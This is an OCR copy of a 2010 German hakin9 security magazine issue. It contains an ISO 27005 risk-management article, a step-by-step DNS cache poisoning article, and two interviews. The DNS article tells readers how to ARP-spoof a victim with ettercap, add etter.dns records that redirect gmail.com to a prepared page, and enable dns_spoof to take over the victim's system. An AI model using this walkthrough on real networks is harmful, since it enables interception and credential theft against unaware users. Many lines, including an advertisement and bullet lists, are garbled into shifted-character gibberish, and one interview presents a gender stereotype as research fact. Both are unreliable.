wertung nach Zeitwert, nach Wiederbeschaffungswert, werden. Es ist also zu bestimmen, mit welcher Wahr-
nach dem Wert für einen potenziellen Angreifer oder scheinlichkeit eine Bedrohung im betrachteten Umfeld
nach dem Schaden für die Organisation aus einem Ver- eintreten wird.
lust des Assets. Immaterielle Werte werden i.d.R. nach Auch die Eintrittswahrscheinlichkeit kann quantita-
dem Wert für einen potenziellen Angreifer oder nach dem tiv oder qualitativ bewertet werden. Da eine quantita-
Schaden für die Organisation aus einem Verlust des As- WLYH %HZHUWXQJ LQ YLHOHQ )lOOHQ HLQH *HQDXLJNHLW YRU-
sets bewertet. Bei der Bewertung ist zu beachten, dass täuschen könnte, ist in den letzten Jahren ein Trend in
Wertekombinationen häufig nicht der Summe der Einzel- Richtung qualitativer Bewertung zu erkennen.

hakin9.org/de 33
ABWEHR

Bewährt haben sich hier etwa drei- bis fünfteilige Ska- Im Rahmen dieses Schrittes sollte auch geprüft wer-
len (z.B. 4: sehr häufig … 0: sehr selten) den, ob die bereits existierenden Sicherheitsmaßnah-
Diese allgemeinen Bedeutungen der Skalenwerte PHQNRUUHNW]XP(LQVDW]NRPPHQ)DOVFKRGHUXQYROO
können für jeden einzelnen spezifischen Anwendungs- ständig eingesetzte Sicherheitsmaßnahmen stellen eine
bereich konkretisiert werden. zusätzliche potentielle Schwachstelle eines Systems dar.
Nachdem Werte, Bedrohungen und Eintrittswahr- Die eigentliche Risikobewertung ist nun das Zusammen-
scheinlichkeiten definiert sind, wird eine Schwachstellen- führen der in den vorherigen Abschnitten beschriebenen
analyse durchgeführt. Unter einer Schwachstelle (Vulne- Maßnahmen und die Erstellung einer Risikomatrix (vergl.
rability) versteht man eine Sicherheitsschwäche eines Abb. 4). Darin werden die bewerteten Risiken gemäß ihres
oder mehrerer Objekte, die durch eine Bedrohung ausge- Risikopotenzials in einer Matrix angeordnet und dem ge-
nützt werden kann. Eine Schwachstelle selbst verursacht wünschten SOLL gegenüber gestellt. Im Anhang der Norm
noch keinen Schaden, sie ist aber die Voraussetzung, befinden sich einige Beispiele für eine Risikobewertung.
die es einer Bedrohung ermöglicht, wirksam zu werden. Anhand der Risikomatrix erfolgt die Priorisierung der
Typische Beispiele für Schwachstellen sind etwa: Risiken, in Abhängigkeit des zur Verfügung stehenden
Mangelnder baulicher Schutz von Räumen mit IT-Ein- Budgets und der Ressourcen.
richtungen
Risikobehandlung
‡ 1DFKOlVVLJH+DQGKDEXQJYRQ=XWULWWVNRQWUROOHQ Die Phase der Risikobehandlung ist das „tägliche Tun“
‡ VFKZDFKH3DVVZRUWPHFKDQLVPHQ GHV 5LVLNRPDQDJHPHQWV ,P )DOOH GHU ,62 
‡ XQ]XUHLFKHQGH $XVELOGXQJ PDQJHOQGHV 6LFKHU bezogen auf die Informationstechnologie das Ge-
heitsbewusstsein genüberstellen der Anforderungen aus der Risikobe-
‡ « wertung mit dem Ergebnis der durchgeführten Maß-
nahmen und eine neue Bewertung dieser: vergl. Abb.
(LQH 6FKZDFKVWHOOHQDQDO\VH LVW GLH hEHUSUIXQJ YRQ 5.
Sicherheitsschwächen und muss sowohl das Umfeld Die Optionen zur Risikobehandlung werden in 4 Ka-
als auch bereits vorhandene Schutzmaßnahmen mit tegorien eingeteilt:
einbeziehen. Es ist wichtig, jede Schwachstelle da-
raufhin zu bewerten, wie leicht es ist, sie auszunutzen. ‡ 5LVLNRUHGXNWLRQ ]%GXUFK6FKXOXQJHQ(LQIKUXQJ
(LQH EHLVSLHOKDIWH $XÀLVWXQJ YRQ 6FKZDFKVWHOOHQ EH bestimmter Maßnahmen, etc.)
¿QGHWVLFKLP$QKDQJ'GHU1RUP ‡ 5LVLNREHLEHKDOWXQJ GDV5LVLNRZLUGDN]HSWLHUW
Vor der eigentlichen Risikobewertung werden noch ‡ 5LVLNRYHUPHLGXQJ ]%GXUFK(LQVWHOOHQULVLNRWUlFK
die bestehenden Sicherheitsmaßnahmen betrachtet tiger Verfahren)
und bewertet. Stellt sich heraus, dass eine bereits exis- ‡ 5LVLNRYHUODJHUXQJ ]%GXUFK2XWVRXUFLQJ
tierende oder geplante Maßnahme ihren Anforderun-
gen nicht gerecht wird, so ist zu prüfen, ob sie ersatz- Risikoüberwachung und –akzeptanz
los entfernt, durch andere Maßnahmen ersetzt oder aus Basierend hierauf erfolgt eine neue Bewertung des
Kostengründen belassen werden soll. Restrisikos und der Risikomanagementprozess geht

Abbildung 4. Beispielhafte Risikomatrix (Bildquelle: HMP)

34 10/2010
IT-Risikomanagement – Wozu brauche ich das?

Abbildung 5. Ablauf Risikobehandlung (Bildquelle: CIS)

über in die Risikoüberwachung. Diesen Ablauf – auch tierte Denkweise und das strukturierte Vorgehen be-
PDCA-Prozess genannt (Plan-Do-Check-Act) – ken- reits vertraut sind.
nen Sie bereits aus dem vorherigen Artikel über die ISO Ohne Informations- und Kommunikationstechnik
27001. Eine neue Bewertung ist ebenfalls durchzufüh- kann heute kaum noch ein Unternehmen auskommen,
ren, wenn sich Vorgaben ändern, neue Assets imple- auch nicht zeitweise. Das gilt auch für kleinere und mitt-
mentiert werden oder die Bedrohungssituation sich än- lere Unternehmen genauso wie für Großunternehmen
dert. und Konzerne. Deshalb sollte das Management wissen,
Bei der Risikoakzeptanz ist es wichtig, die Entschei- welche Risiken gerade im IT-Bereich bestehen und wie
dungskriterien detailliert zu dokumentieren, damit sich diesen begegnet werden kann. Gerade im Bereich der
auch später noch nachvollziehbar sind. Informations- und Telekommunikationssysteme sind
die immateriellen Werte, also diejenigen Werte, denen
Risikoreporting nicht eine Einkaufsrechnung gegenübergelegt werden
Sinn des Risikoreportings ist zum einen die Informati- kann, häufig kaum bekannt.
on des Managements über den aktuellen Stand der Ri- Die Norm ISO/IEC 27005:2008 bietet den Vorteil,
sikosituation und der eingeleiteten Maßnahmen, zum dass mit einem kleinen Teilbereich (z.B. Netzwerk) be-
anderen dient diese natürlich auch der Dokumentation. gonnen werden kann und sukzessive weitere Assets
Weitere Inhalte können z.B. sein, das Sicherheitsbe- einbezogen werden können. Zudem bietet die Norm im
wusstsein zu verbessern oder das Einfordern von Ent- Anhang Beispiele und Checklisten für das Vorgehen.
scheidungen.
Die Ergebnisse von Risikobewertungen sind i.d.R.
vertraulich und dementsprechend zu handhaben.

Kapitel 4 – Nutzen und Fazit ANDREAS LENTWOJT


Die Einführung eines Risikomanagementsystems Der Autor ist Managementberater, CEO und Inhaber „AL-
nach ISO/IEC 27005:2008 unterscheidet sich vom Consult“. Nach dem Studium der Betriebswirtschaft mit den
Prozess her nur in Teilbereichen von der Einführung Schwerpunkten Organisation und IT arbeitete er langjährig
eines kompletten Risikomanagementsystems nach bei Banken und Finanzdienstleistern als Organisations-/IT-
ISO/IEC 31000. Jedoch ist der Aufwand wesentlich Leiter und später als Security-Officer. 2004 gründete er das
geringer, da es sich nur um einen Teilbereich des Un- Beratungsunternehmen ALConsult mit den Schwerpunk-
ternehmens handelt. Auch hier gilt wieder der Grund- ten Security und Prozessmanagement. Er ist zertifizierter ISO
satz, dass Unternehmen, die bereits ein Qualitätsma- 27001-Auditor und besitzt weitere Zertifikate wie CObIT und
nagement-System im Einsatz haben (z.B. ISO 9001), ITIL. Der Schwerpunkt der Beratung liegt im organisatori-
weniger Zeit benötigen, da ihnen die Prozess-orien- schen Bereich und den Prozessen, nicht auf der Technik.

hakin9.org/de 35
)MRJEGL
WMGLIV
WYVJIR

%FWXERHWGLEJJX7MGLIVLIMX

%RKVMJJIEYJ(EXIRYRH7]WXIQI¾FIV
7GL[EGLWXIPPIRMRMRXIVRIXKIFYRHIRIR
%TTPMOEXMSRIRHVSLIRX¦KPMGL
,EPXIR7MIHMI+IJELVIRHIW-RXIVRIXWEYJ
(MWXER^ÕQMX6IQSXI'SRXVSPPIH&VS[WIV
7]WXIQW 6I'S&7 HIVQTVMZEG]+QF,

QTVMZEG]+QF, &IWYGLIR7MIYRW
"N,¤MMOJTDIFO1BSL .FTTF/ŸSOCFSH
#FSMJO 0LUPCFS
'PO  )BMMF 4UBOE7PSUSBH.JI
'BY  +VEXMW^YV1IWWI8JSMBEFO4JFFJO
JOGP!NQSJWBDZEF XXXNQSJWBDZEFQSFTTFWFSBOTUBMUVOHFO
XXXNQSJWBDZEF
ECCGPSVN#FSMJO
0LUPCFS
4UBOE7PSUSBH.JI
DNS Cache Poisoning

DNS Cache Poisoning


Patrick Schmid

Als Ergänzung zu meinem ersten Artikel Java Applet Attacke


erfahren wir hier, wie wir ein Opfer mittels DNS Spoofing
unbemerkt eine präparierte Seite unterschieben können.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


t XJFFJOF.BOJOUIF.JEEMF"UUBDLFGVOLUJPOJFSU t (SVOEMBHFOWPOMJOVYCBTJFSUFO4ZTUFNFO
t XJFNBOFUUFSDBQLPOöHVSJFSUVOEFJOTFU[U t (SVOEMBHFO JN #FSFJDI /FU[XFSLBENJOJTUSBUJPO VOE oNBOB
gement.

or einiger Zeit habe darüber geschrieben,

V
Um ein Opfer auf eine präparierte Seite umzuleiten,
wie man mit SET auf einfache Art und Wei- ist DNS Cache Poisoning (auch DNS Spoofing ge-
se eine Java Applet Attacke durchführen nannt) eine effektive und schnelle Möglichkeit. Darunter
kann. Dieser Artikel lies aber offen, wie man das versteht man ein Angriff, wobei Einträge in einem DNS
Opfer auf die präparierte URL umleitet, was mitun- zu eigenen Gunsten manipuliert werden.
ter wahrscheinlich der schwierigste Teil des ganzen Das Opfer merkt dabei im Idealfall nichts davon: Die-
Angriffes ist. Damit eine solche Attacke aber auch ses tippt wie üblich zum Beispiel www.google.ch ein,
erfolgreich eingesetzt werden kann, dient dieser Ar- nur anstatt bei der DNS-Abfrage die IP-Adresse der
tikel als Ergänzung, um diese Informationslücke zu Google-Server zurückkommt, erhält das Opfer die IP-
füllen. Adresse einer präparierten Seite.

Abbildung 1. Eine Anfrage (rot) an Ziel

hakin9.org/de 37
ANGRIFF

Für diese Attacke werden wir das Tool ettercap ver- Wieder ein Beispiel dazu (Bild 2):
wenden, da es relativ einfach aufgebaut ist, dabei aber
trotzdem viele Einstellungsmöglichkeiten bietet. ‡ 'HU $QJUHLIHU YHUlQGHUW GHQ $53&DFKH GHV 2S
Unsere Attacke wird in zwei Stufen aufgebaut sein. IHUVPLWWHOV$536SRR¿QJVRGDVV]XU,3GHV=LH
Als erstes müssen wir das Opfer oder besser dessen les nicht mehr die MAC-Adresse des Zieles, son-
Computer dazu bringen, seinen ganzen Traffic auf un- dern die des Angreifers zugeordnet ist.
seren Computer umzuleiten, also eine sogenannte ‡ 'HU &OLHQW IUDJW QXQ ZLHGHU EHLP (UVWHOOHQ HLQHV
Man-in-the-middle-Attacke ausführen. Paketes seinen ARP-Cache nach der MAC-Adres-
Dazu werden wir ARP Spoofing verwenden. ARP ist se des Zieles ab. Aber anstatt von seinem ARP-
ein Protokoll auf Layer 2 (Sicherung), um anhand einer Cache auch die MAC-Adresse des Zieles zu erhal-
IP-Adresse die zugehörige MAC-Adresse abzufragen. ten, bekommt er die des Angreifers, welche er in to-
Die Funktionsweise von ARP Spoofing ist einfach. Der taler Unwissenheit in sein Paket packt.
Grund für dessen Erfolg ist der dynamische ARP-Cache ‡ 'HU 6ZLWFK OLHVW QXQ GLH 0$&$GUHVVH DXV GHP
auf jedem Client und eine Zuordnungstabelle auf jedem Pakete aus und vergleicht diese mit seiner Zuord-
Switch: Ein Switch führt eine Zuordnungstabelle, worin die nungstabelle. Anhand der MAC-Adresse (die des
MAC-Adressen der angeschlossenen Geräte dem jeweili- Angreifers) sendet er das Paket an Port 2 und so-
gem Port zugeordnet sind. Diese gibt es deshalb, weil ein mit an den Angreifer und nicht wie vom Opfer ge-
Switch somit genau weiss, welches System an welchem plant an das Ziel.
Port angeschlossen ist und somit auch, an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss. Somit geht der Verkehr aber erst vom Opfer zum An-
Der Client führt einen eigenen ARP-Cache, worin er greifer.
eine MAC-Adresse einer IP-Adresse zuordnet, sodass Damit das Oper davon aber nichts merkt, muss der
er nicht vor jedem Versenden eines Paketes die MAC- Angreifer die abgefangene Anfrage an das Ziel weiter-
Adresse zu einer IP neu abfragen muss. leiten.Nun verläuft die Kommunikation schon vom Op-
Veranschaulicht könnte das dann so ablaufen (Bild 1): fer über den Angreifer zum Ziel.
Damit man aber auch den gesamten Verkehr in die an-
‡ 'HU &OLHQW IUDJW EHLP (UVWHOOHQ HLQHV 3DNHWHV VHL dere Richtungen, also Anfragen und Antworten mitkriegt,
nen ARP-Cache nach der MAC-Adresse des Zieles macht man ARP-Attacken immer auf den Client und den
ab und packt diese danach mit in das Paket. Router / Gateway gleichzeitig, womit nun eine Kommuni-
‡ 'HU 6ZLWFK OLHVW GLH 0$&$GUHVVH DXV GHP 3DNHW kation vom Opfer über den Angreifer zum Ziel und auch
aus und weiss anhand seiner Zuordnungstabelle wieder zurück möglich ist. Damit ist die Man-in-the-Middle-
das zu dieser MAC-Adresse der Port 1 gehört, wo- Attacke komplett und der Angreifer ist in der Lage, den
rauf er das Paket an Port 1 und somit an das Ziel gesamten Netzwerkverkehr seines Opfers nicht nur ab-
weiterleitet. zufangen und mit zuhören, sondern auch beliebig zu ver-
ändern, was uns auch sogleich zu Schritt 2 bringt.
%HL $53 6SRR¿QJ NDQQ GHU $QJUHLIHU GHQ $53&DFKH Im ersten Artikel haben wir als Beispiel die Seite Gmail
seines Opfers so verändern, dass eine IP-Adresse einer kopiert und präpariert. Also wollen wir auch gleich dort
total neuen, beliebigen MAC-Adresse zugeordnet wird. anknüpfen.

Abbildung 2. Eine Anfrage (rot) an Ziel während ARP-Spoofing

38 10/2010
DNS Cache Poisoning

Nun gilt es für den Angreifer darauf zu warten, bis das Somit sind wir auch schon bereit und können bereits
Opfer den A-Record von gmail.com abfragt. Sehen wir mit Schritt 1 beginnen.
nun in unserem mitgehörten Traffic eine solche Anfra- Dazu starten wir ettercap und wählen unter dem
ge, so muss das Antwortpaket soweit verändert werden, Punkt Sniff den Unterpunkt Unified sniffing aus. Dabei
dass anstatt die tatsächliche IP-Adresse nun die IP-Ad- werden wir nach dem Interface gefragt, über welches
resse zu unserer präparierten Seite übermittelt wird. der Angreifer mit dem Netzwerk des Opfers verbunden
Das Opfer selbst empfängt und akzeptiert das so, ist. Im Falle einer Verbindung via Kabel ist das meist
weil es selbst von der Veränderung nichts mitbekommt. eth0, bei WLAN meist wlan0.
Alle Anfragen, welche das Opfer von nun an an Gmail Ist auch das vollbracht, so können das oder die Ziele
macht, werden nicht an Gmail selbst, sondern an un- identifiziert werden. Dazu wählen wir den Punkt Hosts >
sere präparierte Seite gesandt, womit unser Vorhaben Scan for hosts, wodurch automatisch alle 255 Hosts im
erfüllt wäre. Subnet angepingt werden (Bild 3).
So nun genug Theorie, schreiten wir zur Tat! Ist auch das durchgestanden, so können die Ziele un-
Beide Schritte können direkt mit ettercap durchge- ter Hosts > Hosts list ausgewählt werden. Als Target 1
führt werden. muss der Router oder Gateway und das Opfer als Tar-
Dabei handelt es sich um ein Stück Software mit Spe- get 2 ausgewählt werden. Hier muss gegebenenfalls
zialisierung auf Man-in-the-Middle-Attacken, welches mit nmap nach geprüft werden um die IP des Opfers zu
unter der GPL wahlweise für Windows, Linux oder Mac identifizieren.
veröffentlicht wurde. Nun kann mit dem Selektieren von Mitm > Arp poiso-
Leider wurde es seit einiger Zeit nicht mehr weiter- ning die ARP-Attacke gestartet und Schritt 1 somit be-
entwickelt, was sich jedoch nicht auf die Funktionalität endet werden.
auswirkt. Wird nun Wireshark oder tcpdump gestartet, so kann
Ettercap kann wahlweise via GUI oder Konsole be- man allen Netzwerkverkehr des Opfers und des Rou-
dient werden, doch erstmal wird alles konfiguriert. ters / Gateways mitgehört werden.
Zuerst müssen wir unsere eigenen A-Rekords für Nun gleich weiter zu Schritt 2. Nachdem die Man-in-
gmail.com anlegen. Dazu editieren wir die Datei /usr/ the-Middle-Attacke steht, können wir dem Opfer nun
share/ettercap/etter.dns und erweitern diese um einen unsere DNS-Records aufzwingen.
Eintrag wie in Listing 1 dargestellt. Dazu verwenden wir die ettercap-Plugins unter dem
Wenn wir nun speichern, so haben wir festgelegt, Punkt Plugins > Manage the plugins. Da wählen wir den
dass Anfragen nach der IP von gmail.com oder *.gmail. Punkt dns_spof aus.
com mit 127.0.0.1 beantwortet werden sollen. Und somit ist unser DNS-Spoofing-Angriff einsatzfä-
hig und aktiv.
Listing 1. ein A-Record für eine präparierte Seite von Wem als Angreifer kein GUI zur Verfügung steht, der
gmail.com kann auch den interaktiven Modus von ettercap ver-
wenden. Dazu muss ettercap nur mit der Option -T auf-
*.gmail.com A 127.0.0.1 gerufen werden. Alles weitere ist dann in der Hilfe (h-
gmail.com A 127.0.0.1 Taste) nachzulesen.
Nun ist alles getan! Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft, wird es auf unsere
präparierte Seite umgeleitet, ohne dass es davon etwas
merkt.
In Kombination mit SET erhält ein Angreifer so mühe-
los Zugriff auf ein fremdes System.

Links
t http://seicon.ch Unternehmen des Autors
t http://blog.encodingit.ch #MPHEFT"VUPST

PATRICK SCHMID
Der Autor ist System Engineer im Bereich Linux / Unix und
unterstützt nebenbei die Entwicklung und Verbreitung von Li-
nux und Opensource im privaten wie auch im professionellen
Abbildung 3. GTK-GUI von ettercap Umfeld.

hakin9.org/de 39
Interview mit Tobias Glemser

„Sicherheit darf nicht erst am Ende von neuen


Anwendungen, Produkten oder Projekten als
Kontrollinstrument einbezogen, sondern muss
als integraler und vor Allem unterstützender
Bestandteil eines erfolgreichen Produkts
gesehen werden.“
Interview mit Tobias Glemser

hakin9: Erzählen Sie uns bitte ein wenig über sich work und Webfrontend für die grundsätzliche Prüfung
selbst: wer sind Sie, was machen Sie und wie ist es eines Systems mit automatisierten Port- und Vulnera-
dazu gekommen, dass Sie sich mit IT-Sicherheit bility-Scans und einheitlichem Reporting pro System.
Branche beschäftigen? Wir haben dabei das Ziel verfolgt, nicht das Rad neu
Tobias Glemser: Mein Name ist Tobias Glemser, ich zu erfinden, sondern etablierte Programme für die ei-
bin leitender IT-Sicherheitsberater bei der Tele-Consul- gentlichen Prüfungen zu nutzen. Die Ergebnisse der
ting security networking training GmbH in Gäufelden bei einzelnen Schritte werden analog zu einer manuellen
Stuttgart und verantwortlich für den Geschäftsbereich Prüfung mit den jeweiligen Programmen automatisiert
Penetrationstests. Zu Schul- und Zivildienstzeiten hatte verknüpft. Dies ermöglicht eine wesentliche schnellere
ich bereits den ersten Kontakt mit technischen Audits Durchführung bei gleicher Ergebnis-Qualität. Darüber
und habe schlicht das Hobby zum Beruf gemacht. Seit hinaus ist die Oberfläche so gehalten, dass nur die not-
über zehn Jahren bin ich in entsprechenden Projekten wendigsten Optionen zur Verfügung stehen.
tätig. Am Wichtigsten ist der kreative Umgang mit Sys- Neben der Schwachstellen-Prüfung ist auch eine
temen und Anwendungen. Funktionen, die ein Entwick- Erreichbarkeitsprüfung integriert, um einen schnellen
ler nach besten Wissen und Gewissen implementiert Überblick über aktive Systeme in Netzen zu erhalten.
hat so zu nutzen, dass sie nicht mehr dem ursprüngli- Es ist wichtig zu verstehen, dass Penetrationstests
chen Zweck dienen. Im Projektumfeld erhält man viele ohne automatisierte Tests nicht funktionieren. Die schie-
Einblicke in Techniken und Prozesse in unterschiedli- re Anzahl an Schwachstellen lässt sich nur sinnvoll mit
chen Firmen und Behörden, z. B. Energie, Flugraum- entsprechenden Programmen prüfen. Die Ergebnisse
überwachung, Banken. Neben den technischen Aspek- sind dann die Basis für weitere, manuelle Tests. Dabei
ten ist es mein und unser Ziel mit allen Beteiligten des wird mit Know-How und Kreativität versucht, weitere
Kunden ein gemeinsames Ziel zu erreichen. So wäre es Lücken zu finden, um und diese dann auszunutzen.
aus meiner Sicht unsinnig, technische Schwachstellen
mit rein technischen Hilfestellungen zu beheben. Der hakin9: Wie erfolgt die Bedienung des Scanners, und
Ansatz springt deutlich zu kurz. Vielmehr geht es auch welche Lizenzen und Module existieren?
darum, auf Prozesse abzuleiten und diese zu verbes- Tobias Glemser: Die Bedienung erfolgt vollständig
sern. Diese Nachhaltigkeit und die positiven Rückmel- über eine webbasierte Oberfläche. tajanas wird als VM-
dungen treiben an. Darüber hinaus bin ich frei in der ware- oder Hardware-Appliance ausgeliefert, der End-
Beratung, d. h. wir haben keine Produkte im Portfolio, benutzer kann alle Funktionen – dazu gehören auch Ak-
die bei einem technischen Audit möglichst gleich mit an- tualisierungen – über die Weboberfläche nutzen, Jeder
gepriesen werden müssen. Nutzer erhält natürlich trotzdem vollständigen Root-Zu-
griff auf das System. Die Lizenzierung erfolgt pro In-
hakin9: Bereits bei mehreren tausend Tests stallation, eine Limitierung auf IP-Adressen oder eine
von Netzen und Systemen haben Sie den gewisse Anzahl Scans erfolgt nicht. Neben dem Audit-
selbstentwickelten Security Scanner tajanas genutzt. Modul, gibt es auch ein Modul für die Erreichbarkeits-
Was unterscheidet tajanas von anderen solchen prüfung.
Werkzeugen?
Tobias Glemser: Wir haben tajanas zunächst für ei- hakin9: Woher kommt der Name tajanas?
gene Zwecke entwickelt und setzten es auch heute als Tobias Glemser: tajanas steht für „this ain’t just ano-
Basis in Penetrationstests ein. tajanas ist ein Frame- ther network scanner” – weil es ein wie beschrieben ein

hakin9.org/de 41
INTERVIEW

Framework darstellt und nicht den n-ten Port- oder Vul- Nach der Durchführung erhält der Kunde einem umfas-
nerability-Scanner. Wenn wir Bugs in den verwendeten senden, auf seine Umgebung und Realität angepass-
Programmen feststellen oder Ideen für Erweiterungen ten Ergebnisbericht, der im Rahmen eines Abschluss-
haben, geben wir diese direkt in die Community zurück. Workshops mit den technischen verantwortlichen
besprochen wird. Auf Wunsch erfolgt auch die Darstel-
hakin9: Wer sind Benutzer von tajanas? lung vor dem Vorstand bzw. der Leitungsebene.
Tobias Glemser: Zum einen natürlich wir selbst. Zum Das Spektrum eines Penetrationstests ist sehr viel-
anderen setzten IT-Sicherheitsbeauftragte und IT-Revi- fältig und lässt sich nur schwer darstellen. Es handelt
soren das Tool für regelmäßige Sicherheitsprüfungen sich dabei jedoch nicht zwingend um die „bekannten“
ihrer Netze ein. Prüfungen auf Serversysteme. Häufige Einfallstore für
Angreifer sind schlecht gesicherte lokale Netzwerke,
hakin9: Für welche Fälle reichen Penetrationstests Client-Systeme oder auch Multifunktionsdrucker. Bei
nicht aus? Interesse finden sich Informationen z. B. in der Studie
Tobias Glemser: Das hängt von der Zieldefinition des Penetrationstests des BSI, dem Whitepaper Penetrati-
Kunden ab, und was man unter einem Penetrationstest onstests der Tele-Consulting oder auch dem Whitepa-
versteht. Bei Tele-Consulting sind alle Mitarbeiter nicht per Projektierung der Sicherheitsprüfung von Weban-
nur in technische Audits wie Penetrationstests eingebun- wendungen der OWASP.
den, sondern auch in prozessorientierte Beratungen und
Audits wie z. B. ISO 27001 oder BSI IT-Grundschutz. hakin9: Welche Pläne die IT-Sicherheit Branche
Dies ermöglicht es uns, in technischen Audits nicht nur betreffend haben Sie noch vor?
die technischen Lücken aufzuzeigen, sondern auch auf Tobias Glemser: Abseits von technischen Audits ver-
fehlende oder mangelhafte Prozesse hinzuweisen und suchen wir ganzheitliche Prozesse vor allem, aber nicht
konkrete Vorschläge zur Verbesserung zu geben. nur in den IT-Abteilungen zu etablieren und dabei Ad-
ministratoren die Hilfestellungen zu geben, die sie da-
hakin9: Können Sie uns ein konkretes Beispiel bei benötigen. Als Sicherheitsberater oder auch Sicher-
nennen? heitsbeauftrager eines Unternehmens nimmt man meist
Tobias Glemser: Nehmen wir an, dass aus Wirtschaft- die Rolle eines Kontrolleurs ein, der darauf achtet, dass
lichkeitsgründen nicht alle Server in einem Netz in ein Regeln eingehalten werden. Hier ist ein Wandel erfor-
technisches Audit einbezogen werden, sondern nur eine derlich, sowohl bei denen, die sich „Sicherheit“ auf die
definierte Anzahl. Stellt man hier Schwachstellen fest, Fahnen schreiben, als auch bei den Administratoren
so genügt es nicht, die erkannten Schwachstellen oder und Verantwortlichen für Geschäftsbereiche und deren
gar Lücken zu schließen, sondern man muss sich fra- Technik. Sicherheit darf nicht erst am Ende von neuen
gen, wie es zu den Schwachstellen kommen konnte. In Anwendungen, Produkten oder Projekten als Kontrollin-
den seltensten Fällen haben hier Administratoren indi- strument einbezogen, sondern muss als integraler und
viduelle Fehler gemacht, vielmehr scheinen offensicht- vor Allem unterstützender Bestandteil eines erfolgrei-
lich die Vorgaben zur Serverkonfiguration bzw. Härtung chen Produkts gesehen werden. Hier müssen auch und
nicht ausreichend zu sein bzw. diese in ein Information vor allem Sicherheitsberater umdenken, um vorrangig
Security Management System (ISMS) integriert zu sein. als Unterstützer, die sie sind, gesehen und akzeptiert
Darauf weisen wir nachdrücklich in unseren Ergebnis- zu werden. Nur so begreifen die technisch verantwort-
berichten hin, um eine Gesamtverbesserung zu erzie- lichen Mitarbeiter Sicherheitsprüfungen nicht als Prü-
len und unterstützen bei Bedarf auch bei der Umset- fungen ihrer persönlichen Kompetenz, sondern als kon-
zung der organisatorischen Anteile. krete Unterstützung für die Verbesserung vorhandener
Geht man diesen Schritt nicht, werden erfahrungs- Sicherheitsprozesse.
gemäß nur die Systeme verändert, bei denen im Test Im Bereich der technischen Schwachstellen werden
Schwachstellen erkannt wurden. Der Verbesserung der weiterhin Webanwendungen eine große Rolle spielen.
Gesamtsicherheit hilft dies dann allerdings nicht. Daher bin ich seit geraumer Zeit beim Open Web Appli-
cation Security Project (OWASP), den meisten vermut-
hakin9: Wie sieht eine Sicherheitsüberprüfung lich durch die OWASP Top 10 bekannt, ehrenamtlich
mithilfe des Penetrationstests aus? tätig und seit diesem Jahr im Board der deutschen Sek-
Tobias Glemser: Zunächst bedarf es einer klaren Ziel- tion. Beim OWASP Stammtisch Stuttgart (und Stamm-
vorstellung. Entweder haben Kunden diese bereits, tischen in anderen Städten) tauschen sich hier auch
oder sie wird im Rahmen eines Workshops gemeinsam Menschen rund um das Thema zwanglos aus. Wer
erarbeitet. Dabei ist es meist sinnvoll mehrstufig vorzu- Lust hat vorbeizukommen, kann sich auf der deutschen
gehen und die Themen in verschiedenen Arbeitspake- OWASP Webseite informieren.
ten abzuarbeiten. Im Rahmen eines Kick-Offs werden
die Beteiligten informiert und in den Ablauf integriert. Wir bedanken uns für das Gespräch!

42 10/2010
INTERVIEW

„Erfolgreiche Frauen
in der IT-Branche - ein
Erfahrungsbericht“
Interview mit Ulrike Peter

hakin9: Lassen Sie uns bitte ein wenig über sich selbst Aber wie heißt es so schön: „Ausnahmen bestätigen
wissen: wer sind Sie, was machen Sie und wie ist es die Regel“. Und der Trend zeigt beispielsweise, dass
dazu gekommen, dass Sie in der IT-Branche tätig sind? Frauen zunehmend technische Studiengänge bele-
Ulrike Peter: Ich bin PR-Spezialistin und Journalis- gen.
tin durch und durch. Die Liebe zum Schreiben ent-
deckte ich früh. Nach ersten Gehversuchen als freie hakin9: Heutzutage sind wir überall von Computern
Mitarbeiterin bei einer Tageszeitung absolvierte ich umgeben. In der IT-Branche herrscht trotzdem ein
vor zehn Jahren ein Volontariat in einer PR-Agentur Frauenmangel. Woran liegt dies Ihrer Meinung nach?
mit parallelem Fernstudium „Journalismus“. Die ers- Ulrike Peter: Noch lockt es wesentlich mehr Männer in
ten Tage in der Agentur waren wie ein Kopfsprung technische Berufe als Frauen. Ich denke, das Verhältnis
ins kalte Wasser. Denn obwohl ich das journalistische wird auch in Zukunft so bleiben – auch wenn sich die
Rüstzeug besaß, wusste ich anfangs nicht mal, wo klassische Rollenverteilung verschiebt und die „Gren-
sich die Escape-Taste an meinem PC befand, hatte
aber die Aufgabe, ohne spezielles Hintergrundwissen
über komplexe Technologien detaillierte Berichte zu
formulieren. Da dies den Ehrgeiz in mir weckte, ar-
beitete ich mich schnell in die Materie ein und stell-
te fest, dass Public Relations in Verbindung mit der
Erstellung technologischer Texte mein Steckenpferd
ist. Heute bin ich Geschäftsführerin meiner eigenen
PR-Agentur und obwohl ich mittlerweile auch in wei-
teren Branchen und Aufgabengebieten zuhause bin,
ist die Freude daran, „trockene“ und komplexe Inhalte
lebendig werden zu lassen, noch genauso vorhanden
wie am ersten Tag.

hakin9: Viele glauben, dass Computer Männersache


sind. Was halten Sie davon?
Ulrike Peter: Die landläufige Meinung existiert nach
wie vor, dass Männer ein besseres technologisches
Verständnis mitbringen. Dies resultiert nicht selten
aus Vorurteilen, lässt sich aber auch nicht komplett
abstreiten. Denn nicht nur Erfahrungswerte, sondern
auch Belege aus der Hirnforschung zeigen, dass
Frauen besser mit Sprache umgehen können und
Männer sich in Naturwissenschaften wohler fühlen.
Es liegt wohl ein Stück weit in der Natur der Sache.

44 10/2010
Interview mit Ulrike Peter

zen“ in beide Richtungen mehr und mehr verschwim- Vorgesetzten und zum anderen nach den Fähigkeiten
men. Denn auch Männer finden wir heute in Berufen, der Frau. Jeder Mitarbeiter, der neu eingestellt wird,
die vor Jahren ausschließlich Frauen zugeordnet wur- steht vor der Aufgabe, sich zu beweisen – und sollte
den. Und wir sind zwar von elektronischen Geräten wie die Möglichkeit dazu erhalten. Jedoch werden Frau-
PCs, Smartphones etc. umgeben und diese werden en in typischen Männerberufen oft kritischer beäugt
auch rege von beiden Geschlechtern genutzt – aber ei- und stehen länger auf dem Prüfstand. Dies passiert
nen technischen Job zu ergreifen ist ein anderes paar teils unbewusst. Auch beweisen Studien immer wie-
Schuhe. Hierzu gehört ein besonderes Faible. Die Be- der, dass männliche Arbeitnehmer im gleichen Job
weggründe, weshalb in diesem Segment Frauenman- mehr verdienen als weibliche. Hier macht die Gesell-
